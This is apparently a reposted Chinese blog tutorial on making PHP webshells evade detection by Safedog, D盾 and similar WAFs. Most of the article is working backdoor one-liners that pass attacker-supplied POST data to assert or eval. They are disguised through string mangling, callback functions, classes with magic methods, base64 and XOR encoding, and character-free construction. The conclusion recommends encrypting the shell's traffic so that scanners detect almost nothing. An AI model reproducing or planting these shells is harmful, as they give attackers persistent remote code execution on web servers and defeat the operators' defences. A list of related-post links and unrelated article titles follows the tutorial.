Webshell免杀绕过waf
转自圈子404师傅
0x01 前言#
尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧
0x02 目录#
- 关于eval 于 assert
- 字符串变形
- 定义函数绕过
- 回调函数
- 回调函数变形
- 特殊字符干扰
- 数组
- 类
- 编码绕过
- 无字符特征马
- PHP7.1后webshell何去何从
- 总结
0x03 关于eval 于 assert#
关于eval函数在php给出的官方说明是
eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用
可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行
通俗的说比如你<?php $a=eval;$a() ?>
这样是不行的 也造就了用eval的话达不到assert的灵活,但是在php7.1以上assert已经不行
关于assert函数
assert() 回调函数在构建自动测试套件的时候尤其有用,因为它们允许你简易地捕获传入断言的代码,并包含断言的位置信息。 当信息能够被其他方法捕获,使用断言可以让它更快更方便!
0x04 字符串变形#
字符串变形多数用于BYPASS安全狗,相当对于D盾,安全狗更加重视"形"
一个特殊的变形就能绕过安全狗,看看PHP手册,有着很多关于操作字符串的函数
ucwords() //函数把字符串中每个单词的首字符转换为大写。ucfirst() //函数把字符串中的首字符转换为大写。trim() //函数从字符串的两端删除空白字符和其他预定义字符。substr_replace() //函数把字符串的一部分替换为另一个字符串substr() //函数返回字符串的一部分。strtr() //函数转换字符串中特定的字符。strtoupper() //函数把字符串转换为大写。strtolower() //函数把字符串转换为小写。strtok() //函数把字符串分割为更小的字符串str_rot13() //函数对字符串执行 ROT13 编码。
由于PHP的灵活性操作字符串的函数很多,我这里就不一一列举了
用substr_replace()
函数变形assert 达到免杀的效果
<?php $a = substr_replace("assexx","rt",4);$a($_POST['x']);?>
其他函数类似 不一一列举了
0x05 定义函数绕过#
定义一个函数把关键词分割达到bypass效果
<?php function kdog($a){ $a($_POST['x']);}kdog(assert);?>
反之
<?php function kdog($a){ assert($a);}kdog($_POST[x]);?>
效果一样,这种绕过方法,对安全狗还是比较有效的 在d盾面前就显得小儿科了 ,不过后面会讲到如何用定义函数的方法来 绕过d盾
0x05 回调函数#
call_user_func_array()call_user_func()array_filter() array_walk() array_map()registregister_shutdown_function()register_tick_function()filter_var() filter_var_array() uasort() uksort() array_reduce()array_walk() array_walk_recursive()
回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如
<?php forward_static_call_array(assert,array($_POST[x]));?>
这个函数能过狗,但是D盾显示是一级
0x05 回调函数变形#
前面说过众多回调函数已经被加入豪华套餐了,怎么绕过呢,其实也很简单 那就是定义个函数 或者类来调用
定义一个函数
<?php function test($a,$b){ array_map($a,$b);}test(assert,array($_POST['x']));?>
定义一个类
<?php class loveme { var $a; var $b; function __construct($a,$b) { $this->a=$a; $this->b=$b; } function test() { array_map($this->a,$this->b); }}$p1=new loveme(assert,array($_POST['x']));$p1->test();?>
0x06 特殊字符干扰#
特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能执行,网上广为流传的连接符
初代版本
<?php $a = $_REQUEST['a'];$b = null;eval($b.$a);?>
不过已经不能免杀了,利用适当的变形即可免杀 如
<?php $a = $_POST['a'];$b = "\n";eval($b.=$a);?>
其他方法大家尽情发挥如"\r\n\t",函数返回,类,等等
除了连接符号 还有个命名空间的东西 \ 具体大家可以看看php手册
<?php function dog($a){ \assert($a);}dog($_POST[x]);?>
当然还有其他的符号熟读PHP手册就会有不一样的发现
0x07 数组#
把执行代码放入数组中执行绕过
<?php $a = substr_replace("assexx","rt",4);$b=[''=>$a($_POST['q'])];?>
多维数组
<?php $b = substr_replace("assexx","rt",4);$a = array($arrayName = array('a' => $b($_POST['q'])));?>
0x08 类#
说到类肯定要搭配上魔术方法比如 __destruct()
,__construct()
直接上代码
<?php class me{ public $a = ''; function __destruct(){ assert("$this->a"); }}$b = new me;$b->a = $_POST['x'];?>
用类把函数包裹,D盾对类查杀较弱
0x09 编码绕过#
用php的编码函数,或者用异或等等
简单的base64_decode,其中因为他的正则匹配可以加入一些下划线干扰杀软
<?php $a = base64_decode("YXNz+ZX____J____0");$a($_POST[x]);?>
异或
<?php $a= ("!"^"@").'ssert';$a($_POST[x]);?>
0x9 无字符特征马#
对于无特征马这里我的意思是 无字符特征
- 利用异或,编码等方式 例如p神博客的
<?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); //$_='assert';$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); //$__='_POST';$___=$$__;$_($___[_]); //assert($_POST[_]);?>
利用正则匹配字符 如Tab等 然后转换为字符
- 利用POST包获取关键参数执行 例如
<?php $decrpt = $_POST['x'];$arrs = explode("|", $decrpt)[1];$arrs = explode("|", base64_decode($arrs));call_user_func($arrs[0],$arrs[1]);?>
0x10 PHP7.1后webshell何去何从#
在php7.1后面我们已经不能使用强大的assert函数了用eval将更加注重特殊的调用方法和一些字符干扰,后期大家可能更加倾向使用大马
总结#
对于安全狗杀形,d盾杀参的思路来绕过。生僻的回调函数,特殊的加密方式,以及关键词的后传入都是不错的选择。
对于关键词的后传入对免杀安全狗,d盾,河马 等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化
用户可以对传出的post数据进行自定义脚本加密,再由webshell进行解密获取参数,那么以现在的软WAF查杀能力
几乎为0,安全软件也需要与时俱进了。
Webshell免杀绕过waf的更多相关文章
- [9期]软WAF上传绕过+webshell免杀
安全狗上传绕过 思路: 1.扰乱编码 form-data 替换成 ~form-data form-data 改成 f+orm-data form-data 改成 for ...
- JSP Webshell免杀设计
JSP Webshell免杀设计 @author:drag0nf1y 介绍 什么是Webshell? 被服务端解析执行的php.jsp文件 什么是RCE? remote command execute ...
- Webshell免杀研究
前言 不想当将军的士兵不是好士兵,不想getshell的Hacker不是好Hacker~有时候我们在做攻防对抗时经常会碰到可以上传webshell的地方,但是经常会被安全狗.D盾.护卫神.云锁等安全软 ...
- 流包装器实现WebShell免杀
说明: 本文首发自 https://www.secpulse.com/archives/73391.html ,转载请注明出处. 前言 本文是看PHP使用流包装器实现WebShell有感,权当做个笔记 ...
- PHP7.1后webshell免杀
严格的D盾 D盾说,我是个严格的人,看到eval我就报木马,"看着像"="就是"木马,宁可错杀一千,绝不放过一个.好了,多说无益,一起看看严格的D盾是如何错杀的 ...
- Webshell免杀
过狗过D盾 <?php class me{ public $a = ''; function __destruct(){ assert("$this->a"); }}$ ...
- 全方位构造免杀 webshell 小结[一]
转载自https://klionsec.github.io/2017/10/11/bypasswaf-for-webshell/ 全方位构造免杀 webshell 小结[一] 前言: 本 ...
- 绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)
这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法. 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测. 废话不多说,切入正题.... 1.实验环境: Win ...
- Suctf知识记录&&PHP代码审计,无字母数字webshell&&open_basedir绕过&&waf+idna+pythonssrf+nginx
Checkin .user.ini构成php后门利用,设置auto_prepend_file=01.jpg,自动在文件前包含了01.jpg,利用.user.ini和图片马实现文件包含+图片马的利用. ...
随机推荐
- 关于spring boot多张表建立外健的讨论
现在有四张表:student(学生表).blogs(博客表).comment(评论表).reply(回复表) 现在说一下这四张表: student(学生表):学生的信息记录表 blogs(博客表):学 ...
- OPC质量列表(OPC quality of the list)质量戳定义
参考:<OPC统一架构>中文版 0 Bad1 Bad, Low Limited2 Bad, High Limited3 Bad, Constant4 Bad, Configuration ...
- CentOS 7.6安装MySQL 5.7GA版
环境准备 卸载mariadb rpm -qa | grep mariadb rpm -e --nodeps mariadb-libs-5.5.60-1.el7_5.x86_64 centos7 内部集 ...
- oracle 常用脚本以及语句
oracle 常用脚本以及语句 一.oracle 安装10G 单机初始化环境: #!/bin/bash #关闭selinuxsed -i 's\SELINUX=enforcing\SELINUX=di ...
- [Advanced Python] 10 - Transfer parameters
动态库调用 一.Python调用 .so From: Python调用Linux下的动态库(.so) (1) 生成.so:.c to .so lolo@-id:workme$ gcc -Wall -g ...
- sql server 中常用修改列 ,创建主外键操作
表结构 CREATE TABLE [staff] ( [id] [varchar](50) NOT NUL L, [name] [varchar](50) NOT NULL, [password] [ ...
- vs加调试代码的正确姿势
为了方便,我们会在系统中加入一些调试代码,比如自动登录,这样会省掉很多精力时间,但用的姿势不对, 第一重姿势:打包注释 我看一些人在vs中加调试代码(比如自动登录),然后打包的时候注释掉,这样操作是省 ...
- DefaultSerializer requires a Serializable payload but received an object of type [model.Admin]
一.问题描述: 在用redis做二级缓存时,出现如下异常 DefaultSerializer requires a Serializable payload but received an o ...
- Python 爬虫监控女神的QQ空间新的说说,实现秒赞,并发送说说内容到你的邮箱
这个文章主要是在前一篇文章上新增了说说秒赞的功能 前一篇文章可以了解一下 那么,这次主要功能就是 监控女神的 QQ空间,一旦女神发布新的说说,马上点赞,你的邮箱马上就会收到说说内容,是不是想了解一下 ...
- 深度汉化GCompris-qt,免费的幼儿识字软件
1 需求 因为有个小孩上幼儿园了,想开始教他一些汉语拼音和基本的汉字,但通过一书本和卡片又有些枯燥乏味,于上就上网搜索一些辅助认字的应用,还购买了悟空识字APP,在用的过程中发现他设置了很严格的关卡, ...